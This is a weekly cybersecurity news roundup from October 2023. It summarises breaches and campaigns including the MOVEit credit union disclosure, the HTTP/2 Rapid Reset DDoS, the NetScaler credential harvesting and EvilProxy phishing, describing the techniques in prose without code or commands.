Thursday, October 12th, 2023
Cybersecurity Week in Review (13/10/2023)
MOVEit Saga Drags on as Credit Union Discloses 100K Victims
University Federal Credit Union has admitted a data breach related to this year’s hack of the third-party MOVEit software. The disclosure adds yet another organization to the tally of victims of the cyberattack, which is claimed by the Russia-based Cl0p group.
The notorious ransomware gang had previously listed University Federal Credit Union as one of its victims back in July. Now, that appears to have been borne out by a statement from the organization issued to customers on October 10th.
The union said it confirmed that a breach had occurred following a four-month investigation. It was tipped off by MOVEit at the time of the original attack by Cl0p in May.
“We received notice from one of our vendors, MOVEit, that they experienced a global data security event that allowed unauthorized users access to data stored on their software platform,” said the union.
It notified the attorney general in Maine, which imposes strict reporting requirements on data breaches affecting any of its residents, of a breach potentially affecting 102,650 people that exposed financial account and credit and debit card numbers.
However, the union told affected clients that to the best of its knowledge it has “no evidence that any of your information has been used to commit financial fraud.”
That said, it’s also widely understood that such data can and will be used to commit online crimes relating to fraud and identity theft, meaning tens of thousands more Americans must now join the estimated millions already deemed to be at risk from the Cl0p attack.
The union has offered affected parties a year of free identity theft protection services, and urges customers to remain vigilant to the possibility of future attacks leveraging the exposed data.
“We will continue to actively monitor this situation,” it added. “Please remember to remain vigilant in reviewing your financial account statements and credit reports for fraudulent or irregular activity on a regular basis.”
Source – https://cybernews.com/news/moveit-hack-credit-union-discloses-100k-victims/
Air Europa Data Breach: Customers Warned to Cancel Credit Cards
Spanish airline Air Europa, the country’s third-largest airline and a member of the SkyTeam alliance, warned customers on Monday to cancel their credit cards after attackers accessed their card information in a recent data breach.
“We inform you that a cybersecurity incident was recently detected in one of our systems consisting of possible unauthorized access to your bank card data,” Air Europa said in emails sent to affected individual.
“We have secured our systems, guaranteeing the correct functioning of the service. Additionally, we have made the due notifications to the competent authorities and necessary entities (AEPD, INCIBE, banks, etc.).”
The credit card details exposed in the breach include card numbers, expiration dates, and the 3-digit CVV (Card Verification Value) code on the back of the payment cards.
Air Europa also warned affected customers to ask their banks to cancel their cards used on the airline’s website due to “the risk of card spoofing and fraud” and “to prevent possible fraudulent use.”
Customers were also advised not to provide their personal info or card PINs to anyone contacting them over the phone or via email and not to open any links in emails or messages warning them of fraudulent operations involving their cards.
The company has yet to reveal how many of its customers were affected by the data breach, the date its systems were breached, and when the incident was detected.
Two years ago, in March 2021, the Spanish Data Protection Agency (DPA) also fined €600,000 the airline for violations of the European Union’s General Data Protection Regulation (EU GDPR) and for notifying the privacy watchdog of the data breach more than 40 days later.
The 2021 data breach affected roughly 489,000 individuals, with the attackers gaining access to their contact and bank account details (card numbers, expiration dates, and CVV codes) stored in 1,500,000 data records.
While criminals used around 4,000 bank cards’ data in fraudulent activities, Air Europa classified the breach as a medium-risk incident and chose not to inform the affected individuals.
Researchers Uncover Grayling APT’s Ongoing Attack Campaign Across Industries
A previously undocumented threat actor of unknown provenance has been linked to a number of attacks targeting organizations in the manufacturing, IT, and biomedical sectors in Taiwan.
The attacks have been attributed to an advanced persistent threat (APT) it tracks under the name Grayling. Evidence shows that the campaign began in February 2023 and continued until at least May 2023.
Also likely targeted as part of the activity is a government agency located in the Pacific Islands, as well as entities in Vietnam and the U.S.
The activity stood out due to the use by Grayling of a distinctive DLL side-loading technique that uses a custom decryptor to deploy payloads. The motivation driving this activity appears to be intelligence gathering.
The initial foothold to victim environments is said to have been achieved by exploiting public-facing infrastructure, followed by the deployment of web shells for persistent access.
The attack chains then leverage DLL side-loading via SbieDll_Hook to load a variety of payloads, including Cobalt Strike, NetSpy, and the Havoc framework, alongside other tools like Mimikatz. Grayling has also been observed killing all processes listed in a file called processlist.txt.
DLL side-loading is a popular technique used by a variety of threat actors to get around security solutions and trick the Windows operating system into executing malicious code on the target endpoint.
This is often accomplished by placing a malicious DLL with the same name as a legitimate DLL used by an application in a location where it will be loaded before the actual DLL by taking advantage of the DLL search order mechanism.
It’s worth noting that the use of DLL side-loading with respect to SbieDll_Hook and SandboxieBITS.exe was previously observed in the case of Naikon APT in attacks targeting military organizations in Southeast Asia.
There is no evidence to suggest that the adversary has engaged in any form of data exfiltration to date, suggesting the motives are geared more toward reconnaissance and intelligence gathering.
The use of publicly available tools is seen as an attempt to complicate attribution efforts, while process termination indicates detection evasion as a priority for staying under the radar for extended periods of time.
Source – https://thehackernews.com/2023/10/researchers-uncover-grayling-apts.html
New ‘HTTP/2 Rapid Reset’ Zero-day Attack Breaks DDoS Records
A new DDoS (distributed denial of service) technique named ‘HTTP/2 Rapid Reset’ has been actively exploited as a zero-day since August, breaking all previous records in magnitude.
News of the zero-day technique comes as a coordinated announcement between Amazon Web Services, Cloudflare, and Google, who report mitigating attacks reaching 155 million requests per second (Amazon), 201 million rps (Cloudflare), and a record-breaking 398 million rps (Google).
Google says they were able to mitigate these new attacks by adding further capacity on the edge of their network.
Cloudflare comments that the size of the attack it mitigated is three times bigger than its previous record, from February 2023 (71 million rps), and it’s alarming that this was achieved using a relatively small botnet comprising 20,000 machines.
Since late August, Cloudflare has detected and mitigated over a thousand ‘HTTP/2 Rapid Reset’ DDoS attacks that surpassed 10 million rps, with 184 breaking the previous 71 million rps record. Cloudflare is confident that as further threat actors employ more expansive botnets along with this new attack method, HTTP/2 Rapid Reset attacks will continue to break even greater records.
The novel attack exploits a zero-day vulnerability tracked as CVE-2023-44487, which abuses a weakness in the HTTP/2 protocol. Simply put, the attack method abuses HTTP/2’s stream cancellation feature to continuously send and cancel requests, overwhelming the target server/application and imposing a DoS state.
HTTP/2 features a safeguard in the form of a parameter that limits the number of concurrently active streams to prevent DoS attacks; however, this isn’t always effective.
The protocol developers introduced a more efficient measure called “request cancelation,” which doesn’t tear down the whole connection but which can be abused.
Malicious actors have been abusing this feature since late August to send a flurry of HTTP/2 requests and resets (RST_Stream frames) on a server, asking it to process each of them and perform rapid resets, overwhelming its capacity to respond to new incoming requests.
“The protocol does not require the client and server to coordinate the cancelation in any way, the client may do it unilaterally,” explains Google in its post on the issue.
“The client may also assume that the cancellation will take effect immediately when the server receives the RST_STREAM frame, before any other data from that TCP connection is processed.”
The attacks were eventually mitigated using a system designed to handle hyper-volumetric attacks called ‘IP Jail,’ which the internet firm expanded to cover its entire infrastructure. This system “jails” offending IPs and bars them from using HTTP/2 for any Cloudflare domain for a period of time while impacting legitimate users sharing the jailed IP with a minor performance drop.
Amazon says it mitigated dozens of these attacks without providing any details on their impact, highlighting that the availability of their customer services was maintained.
All three firms conclude that the best approach for clients to counter HTTP/2 Rapid Reset attacks is to use all available HTTP-flood protection tools and bolster their DDoS resilience with multifaceted mitigations.
Unfortunately, as this tactic abuses the HTTP/2 protocol, there is no general fix that entirely blocks attackers from using this DDoS technique. Instead, software developers who utilize the protocol in their software are implementing rate controls to mitigate HTTP/2 Rapid Reset attacks.
DC Board of Elections Discloses Data Breach
The District of Columbia Board of Elections (DCBOE) on Friday confirmed that voter records were compromised in a data breach at a third-party services provider. An independent agency of the District of Columbia Government, the DCBOE is responsible for the administration of ballot access, elections, and voter registration.
“On 10/5, DCBOE became aware of a cybersecurity incident involving DC voter records. While the incident remains under investigation, DCBOE’s internal databases and servers were not compromised,” the agency announced on Friday.
According to DCBOE’s official statement, the data breach occurred at DataNet, which provides website hosting services to the agency. The incident came to light after a relatively new ransomware group named RansomedVC claimed to have breached DCBOE’s systems, exfiltrating more than 600,000 lines of US voter records.
The stolen information, DataBreaches reports, includes names, driver’s license numbers, phone numbers, birth dates, addresses, email addresses, partial Social Security numbers, voter IDs, registration dates, political party affiliation, and polling place.
Most of the compromised information, DCBOE notes in its official statement, is typically public, except for cases where “it has been made confidential in accordance with District of Columbia rules and regulations”. By law, this information can be easily obtained from DCBOE upon request.
The agency also says that, after learning of the data breach, it immediately launched an investigation, with assistance from data security and federal government partners, including MS-ISAC, the FBI, DHS, and OCTO.
DCBOE also took down its website, replacing it with a maintenance page, and conducted vulnerability scans on its database, server, and IT networks.
“DCBOE continues to assess the full extent of the breach, identify vulnerabilities, and take appropriate measures to secure voter data and systems,” the agency notes, promising additional information as it becomes available.
RansomedVC says it plans to sell the stolen data – not all of which can be obtained legally from DCBOE – to a single buyer, but did not share details on the price.
The hacking group recently claimed to have breached Sony’s systems, obtaining source code, access to Sony applications, and confidential documents. Sony told SecurityWeek that it has identified unauthorized activity on a single server located in Japan.
Source – https://www.securityweek.com/dc-board-of-elections-discloses-data-breach/
PEACHPIT: Massive Ad Fraud Botnet Powered by Millions of Hacked Android and iOS
An ad fraud botnet dubbed PEACHPIT leveraged an army of hundreds of thousands of Android and iOS devices to generate illicit profits for the threat actors behind the scheme.
The botnet is part of a larger China-based operation codenamed BADBOX, which also entails selling off-brand mobile and connected TV (CTV) devices on popular online retailers and resale sites that are backdoored with an Android malware strain called Triada.
The PEACHPIT botnet’s conglomerate of associated apps were found in 227 countries and territories, with an estimated peak of 121,000 devices a day on Android and 159,000 devices a day on iOS.
The infections are said to have been realized through a collection of 39 apps that were installed more than 15 million times. Devices fitted with the BADBOX malware allowed the operators to steal sensitive data, create residential proxy exit peers, and commit ad fraud through the bogus apps.
It’s currently not clear how the Android devices are compromised with a firmware backdoor, but evidence points to a hardware supply chain attack of a Chinese manufacturer.
Details about the criminal enterprise were first documented in May 2023, attributing it to an adversary it tracks as Lemon Group.
At least 200 distinct Android device types, including mobile phones, tablets, and CTV products, were identified to have exhibited signs of BADBOX infection, suggesting a widespread operation.
A notable aspect of the ad fraud is the use of counterfeit apps on Android and iOS made available on major app marketplaces such as the Apple App Store and Google Play Store as well as those that are automatically downloaded to backdoored BADBOX devices.
Present within the Android apps is a module responsible for creating hidden WebViews that are then used to request, render, and click on ads, and masquerading the ad requests as originating from legitimate apps, a technique previously observed in the case of VASTFLUX.
The fraud prevention firm noted that it worked with Apple and Google to disrupt the operation, adding “the remainder of BADBOX should be considered dormant: the C2 servers powering the BADBOX firmware backdoor infection have been taken down by the threat actors.”
What’s more, an update pushed out earlier this year has been found to remove the modules powering PEACHPIT on BADBOX-infected devices in response to mitigation measures deployed in November 2022.
That being said, it’s suspected the attackers are adjusting their tactics in a likely attempt to circumvent the defenses.
Source – https://thehackernews.com/2023/10/peachpit-massive-ad-fraud-botnet.html
Credential Harvesting Campaign Targets Unpatched NetScaler Instances
A credential harvesting campaign is targeting Citrix NetScaler gateways that have not been patched against a recent vulnerability, IBM reports.
Tracked as CVE-2023-3519 (CVSS score of 9.8), the vulnerability was disclosed in July, but had been exploited since June 2023, with some of the attacks targeting critical infrastructure organizations.
By mid-August, threat actors exploited this vulnerability as part of an automated campaign, backdooring roughly 2,000 NetScaler instances. At least 1,350 NetScaler instances compromised in previous attacks were appearing in scans last week.
In September, IBM observed a new malicious campaign targeting unpatched NetScaler devices to inject a script on the authentication page and steal user credentials.
As part of the observed attacks, a threat actor is exploiting CVE-2023-3519 to inject a PHP web shell, which then allows them to append custom HTML code to the legitimate ‘index.html’ file, to load a JavaScript file hosted on the attacker’s infrastructure on the VPN authentication page.
The JavaScript fetches and runs additional code to attach a custom function on the ‘Log_On’ element, meant to collect the username and password supplied by the user and send it to a remote server.
As part of the campaign, the threat actor created numerous domains and registered them in August, abusing Cloudflare to hide their hosting location.
IBM says that it has identified “at least 600 unique victim IP addresses hosting modified NetScaler Gateway login pages,” most of them located in the US and Europe. According to Shadowserver’s scans, there are at least 285 NetScaler instances compromised in this campaign.
The first infections likely occurred on August 11, though the campaign “could have begun closer to when the domains were registered”, on August 4, IBM says.
The JavaScript files observed in these attacks are almost identical, with the command-and-control (C&C) being the only difference between them. The collected credentials have been sent to the same URL.
IBM has retrieved some of the web shells and modified versions of the ‘index.html’ file and is providing information on the indicators of compromise (IoCs) that organizations should look for when hunting for potential targeting of their NetScaler instances.
According to IBM, organizations should consider not only patching their NetScaler gateways, but also changing all their certificates and passwords as part of their remediation efforts.
Source – https://www.securityweek.com/credential-harvesting-campaign-targets-unpatched-netscaler-instances/
Cybercriminals Using EvilProxy Phishing Kit to Target Senior Executives in U.S. Firms
Senior executives working in U.S.-based organizations are being targeted by a new phishing campaign that leverages a popular adversary-in-the-middle (AiTM) phishing toolkit named EvilProxy to conduct credential harvesting and account takeover attacks.
Menlo Security said the activity started in July 2023, primarily singling out banking and financial services, insurance, property management and real estate, and manufacturing sectors.
EvilProxy, first documented in September 2022, functions as a reverse proxy that’s set up between the target and a legitimate login page to intercept credentials, two-factor authentication (2FA) codes, and session cookies to hijack accounts of interest.
The threat actors behind the AiTM phishing kit are tracked by Microsoft under the moniker Storm-0835 and are estimated to have hundreds of customers.
“These cyber criminals pay monthly license fees ranging from $200 to $1,000 USD and carry out daily phishing campaigns,” the tech giant said. “Because so many threat actors use these services, it is impractical to attribute campaigns to specific actors.”
In the latest set of attack, victims are sent phishing emails with a deceptive link pointing to Indeed, which, in turn, redirects the individual to an EvilProxy page to harvest the credentials entered.
This is accomplished by taking advantage of an open redirect flaw, which occurs when a failure to validate user input causes a vulnerable website to redirect users to arbitrary web pages, bypassing security guardrails.
The parameters in the URL that follow the ‘?’ are a combination of parameters unique to indeed.com and the target parameter whose argument consists of the destination URL. Hence the user upon clicking the URL ends up getting redirected to example.com. In an actual attack, the user would be redirected to a phishing page.
The development arrives as threat actors are leveraging Dropbox to create fake login pages with embedded URLs that, when clicked, redirect users to bogus sites that are designed to steal Microsoft account credentials as part of a business email compromise (BEC) scheme.
Source – https://thehackernews.com/2023/10/cybercriminals-using-evilproxy-phishing.html
ALPHV Ransomware Gang Claims Attack on Florida Circuit Court
The ALPHV (BlackCat) ransomware gang has claimed an attack that affected state courts across Northwest Florida (part of the First Judicial Circuit) last week. Allegedly, the threat actors have acquired personal details like Social Security numbers and CVs of employees, including judges.
Additionally, ALPHV claims to possess a comprehensive network map of the court’s systems, complete with local and remote service credentials. Ransomware gangs commonly threaten to leak stolen data online to coerce victims into negotiation or reopening discussions.
The presence of Florida’s First Judicial Circuit’s data leak page on ALPHV’s website suggests that the court has either not engaged in negotiations with the ransomware operation or has firmly declined to meet the gang’s demands.
The Florida circuit court disclosed last week that it was investigating a cyberattack that disrupted its operations on Monday morning, October 2nd.
“This event will significantly affect court operations across the Circuit, impacting courts in Escambia, Okaloosa, Santa Rosa, and Walton counties, for an extended period,” a statement published on the court’s website says.
“The Circuit is prioritizing essential court proceedings but will cancel and reschedule other proceedings and pause related operations for several days, beginning Monday, October 2, 2023.”
Amid the ongoing investigation into the attack, judges in the four counties have been communicating with litigants and attorneys regarding their weekly scheduled hearings. Additionally, the court authorities confirmed that all facilities continue operating without disruptions. The court has not yet verified the ransomware attack claims made by the ALPHV gang.
The BlackCat/ALPHV ransomware operation surfaced in November 2021 and is believed to be a rebranding of DarkSide/BlackMatter. Initially known as DarkSide, the group gained international attention following the breach of Colonial Pipeline, leading to scrutiny from law enforcement agencies globally.
After rebranding again as BlackMatter in July 2021, their operations abruptly ceased in November 2021 when authorities seized their servers, and security firm Emsisoft created a decryptor exploiting a ransomware vulnerability.
This ransomware operation is known for consistently targeting global enterprises and continuously adapting and refining their tactics.
In a recent incident, an affiliate tracked as Scattered Spider claimed responsibility for the attack on MGM Resorts, claiming to have encrypted over 100 ESXi hypervisors after the company shut down internal infrastructure and declined to negotiate a ransom.
Gaza-Linked Cyber Threat Actor Targets Israeli Energy and Defense Sectors
A Gaza-based threat actor has been linked to a series of cyber attacks aimed at Israeli private-sector energy, defense, and telecommunications organizations. Microsoft, which revealed details of the activity in its fourth annual Digital Defense Report, is tracking the campaign under the name Storm-1133.
“We assess this group works to further the interests of Hamas, a Sunni militant group that is the de facto governing authority in the Gaza Strip, as activity attributed to it has largely affected organizations perceived as hostile to Hamas,” the company said.
Targets of the campaign included organizations in the Israeli energy and defense sectors and entities loyal to Fatah, a Palestinian nationalist and social democratic political party headquartered in the West Bank region.
Attack chains entail a mix of social engineering and fake profiles on LinkedIn that masquerade as Israeli human resources managers, project coordinators, and software developers to contact and send phishing messages, conduct reconnaissance, deliver malware to employees at Israeli organizations.
Microsoft said it also observed Storm-1133 attempting to infiltrate third-party organizations with public ties to Israeli targets of interest. These intrusions are designed to deploy backdoors, alongside a configuration that allows the group to dynamically update the command-and-control (C2) infrastructure hosted on Google Drive.
The disclosure overlaps with an escalation in the Israeli-Palestinian conflict, which has been accompanied by a surge in malicious hacktivist operations such as Ghosts of Palestine that aim to bring down government websites and IT systems in Israel, the U.S., and India.
The development also comes as nation-state threats have shifted away from destructive and disruptive operations to long-term espionage campaigns, with the U.S., Ukraine, Israel, and South Korea emerging as some of the most targeted nations in Europe, Middle East and North Africa (MENA), and Asia-Pacific regions.
This evolving tradecraft is evidenced by the recurring use of custom tools and backdoors – e.g., MischiefTut by Mint Sandstorm (aka Charming Kitten) – to facilitate persistence, detection evasion, and credential theft.
Source – https://thehackernews.com/2023/10/gaza-linked-cyber-threat-actor-targets.html
Contact Us
The data you supply here will not be added to any mailing list or given to any third party providers without further consent. View our Privacy Policy for more information.